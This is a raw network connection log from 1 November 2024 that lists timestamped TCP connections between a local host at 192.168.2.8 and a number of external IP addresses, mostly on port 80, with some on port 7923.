                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.855348110 CET805625182.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:23.855530024 CET805625182.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.017421007 CET805625054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.019834042 CET5625080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.026056051 CET805625054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.027724028 CET5625080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.036464930 CET5625280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.042851925 CET805625218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.043739080 CET5625280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.043859005 CET5625280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.043869972 CET5625280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.050880909 CET805625218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:24.050904989 CET805625218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.481919050 CET805625218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.483933926 CET5625280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.489391088 CET805625218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.491760969 CET5625280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.497596025 CET5625380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.502629042 CET805625354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.502722025 CET5625380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.502861023 CET5625380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.502871990 CET5625380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.507690907 CET805625354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:25.507704973 CET805625354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.328035116 CET805625354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.328202963 CET5625380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.333636999 CET805625354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.333678961 CET5625380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.342972040 CET5625480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.347896099 CET805625444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.347954035 CET5625480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.348078966 CET5625480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.348133087 CET5625480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.352945089 CET805625444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.352982044 CET805625444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.455801964 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.654952049 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.721704960 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.726604939 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.920870066 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.926028013 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:26.931015968 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.014327049 CET805625444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.015872955 CET5625480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.021136045 CET805625444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.021203041 CET5625480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.029839993 CET5625580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.034636974 CET8056255172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:27.034730911 CET5625580192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.219732046 CET5626280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.224668980 CET805626282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.224865913 CET5626280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.224966049 CET5626280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.225047112 CET5626280192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.229845047 CET805626282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.229868889 CET805626282.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.280217886 CET805626113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.284310102 CET5626180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.290097952 CET805626113.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.290326118 CET5626180192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.303715944 CET5626380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.308854103 CET805626344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.311827898 CET5626380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.311928988 CET5626380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.311928988 CET5626380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.316855907 CET805626344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.316865921 CET805626344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.982145071 CET805626344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.982378960 CET5626380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.987514973 CET805626344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.987555981 CET5626380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:35.998308897 CET5626480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:36.003211975 CET805626418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:36.003298044 CET5626480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:36.003438950 CET5626480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:36.003505945 CET5626480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:36.008230925 CET805626418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:36.008239985 CET805626418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.429795027 CET805626418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.431469917 CET5626480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.436846018 CET805626418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.437030077 CET5626480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.446969032 CET5626580192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.451816082 CET8056265172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.452362061 CET5626580192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.452526093 CET5626580192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.452573061 CET5626580192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.457464933 CET8056265172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:37.457475901 CET8056265172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.123817921 CET8056265172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.124072075 CET5626580192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.124155998 CET5626580192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.127876043 CET5626680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.128957987 CET8056265172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.132786036 CET8056266172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.132848978 CET5626680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.133004904 CET5626680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.133049965 CET5626680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.137860060 CET8056266172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.137888908 CET8056266172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.804853916 CET8056266172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.804965973 CET5626680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.805010080 CET5626680192.168.2.8172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.809829950 CET8056266172.234.222.143192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.822491884 CET5626780192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.827366114 CET805626734.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:38.827471972 CET5626780192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.986391068 CET805627244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:43.986428022 CET5627280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.390685081 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.395636082 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.395698071 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.400619030 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.400749922 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.405431986 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:44.405539036 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.213447094 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.213671923 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.218936920 CET805627354.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.219069958 CET5627380192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.231750965 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.236746073 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.236841917 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.237193108 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.237371922 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.241975069 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:45.242136955 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.080709934 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.080890894 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.086222887 CET805627435.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.086286068 CET5627480192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.095251083 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100199938 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100276947 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100435972 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.100544930 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.105189085 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.105360985 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.760648966 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.760799885 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.765935898 CET80562753.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.765985966 CET5627580192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.775178909 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780050993 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780107975 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780239105 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.780261993 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.785003901 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:46.785012960 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.487175941 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.489104986 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.489104986 CET5627680192.168.2.8165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.494013071 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.494060040 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.666336060 CET8056276165.160.15.20192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.686037064 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.690953016 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.691059113 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.691231012 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.691231012 CET5627780192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.696041107 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.696053982 CET805627754.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.697906971 CET805626882.112.184.197192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698014975 CET5626880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:47.698226929 CET5626880192.168.2.882.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.205813885 CET5628380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.211735010 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.216949940 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.217179060 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.217179060 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.217221975 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.222040892 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.222446918 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.889739990 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.889969110 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.895287991 CET805628544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.895361900 CET5628580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.904894114 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.909827948 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.909899950 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.910161018 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.910218954 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.915045023 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:51.915273905 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.577403069 CET805628418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.577562094 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.582756042 CET805628418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.582839012 CET5628480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.594235897 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600053072 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600117922 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600277901 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.600327969 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.605171919 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:52.605180979 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.261377096 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.261583090 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.268379927 CET805628718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.268449068 CET5628780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.278045893 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.284112930 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.287832022 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.287925005 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.287925005 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.294775009 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.294785023 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.348206043 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.348436117 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.354955912 CET805628618.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.355027914 CET5628680192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.363513947 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.369771957 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.369904041 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.369999886 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.370074034 CET5628980192.168.2.8172.234.222.138
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.375955105 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.376091003 CET8056289172.234.222.138192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.674455881 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.679275990 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.944061995 CET805628844.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.944899082 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.945061922 CET5628880192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:53.946613073 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.140739918 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.140939951 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.141118050 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.141118050 CET5629780192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.145915031 CET805629713.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:26:57.145926952 CET805629713.251.16.150192.168.2.8
